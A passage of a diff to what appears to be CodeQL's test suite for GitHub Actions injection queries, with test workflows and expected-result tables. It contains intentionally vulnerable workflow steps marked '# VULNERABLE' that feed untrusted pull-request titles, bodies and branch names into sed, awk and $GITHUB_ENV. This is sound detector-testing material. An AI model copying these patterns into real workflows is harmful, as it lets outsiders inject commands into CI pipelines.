${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index 450079a19f67..b3f6c4bf7822 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvVarInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b751cd05888c..94e2af8ecaa7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -93,3 +92,4 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index cfc44d8a86df..fc6a3a80c984 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvVarInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml index b7968c4f7a62..4b6888449c00 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -6,4 +6,4 @@ jobs: steps: - uses: ruby/setup-ruby@v2 with: - ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical] + ruby-version: ${{ github.event.comment.body }} diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 7e3d87977b1f..281fd39552a7 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,6 +1,6 @@ -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 3dc57e81d632..7057e60695b8 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-078/CommandInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-078/CommandInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index be81405805bc..99ebb1edc05d 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,5 @@ -#select edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref index 41310436d7e3..9fbbb302a175 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-078/CommandInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-078/CommandInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 2566f6cc674b..5d841e50dbb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -7,7 +7,7 @@ jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical] + TITLE: ${{github.event.pull_request.title}} steps: - name: Checkout uses: actions/checkout@v4 @@ -18,50 +18,50 @@ jobs: echo "s/FOO/$TITLE/g" - run: | # VULNERABLE - sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$TITLE/g" - run: | # VULNERABLE - echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical] + echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: | # VULNERABLE - echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical] + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - run: | # VULNERABLE - awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical] + awk "BEGIN {$TITLE}" - run: | # VULNERABLE - sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical] + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | # VULNERABLE - sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical] + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json - run: | # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | # VULNERABLE BODY=$(git log --format=%s) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD ) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # VULNERABLE BODY=$(git diff --name-only HEAD^ | xargs) - sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] + sed "s/FOO/$BODY/g" > /tmp/foo - run: | # NOT VULNERABLE echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 4f4d67c2325c..5eddb791ae5c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,16 +1,3 @@ -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -33,3 +20,16 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | 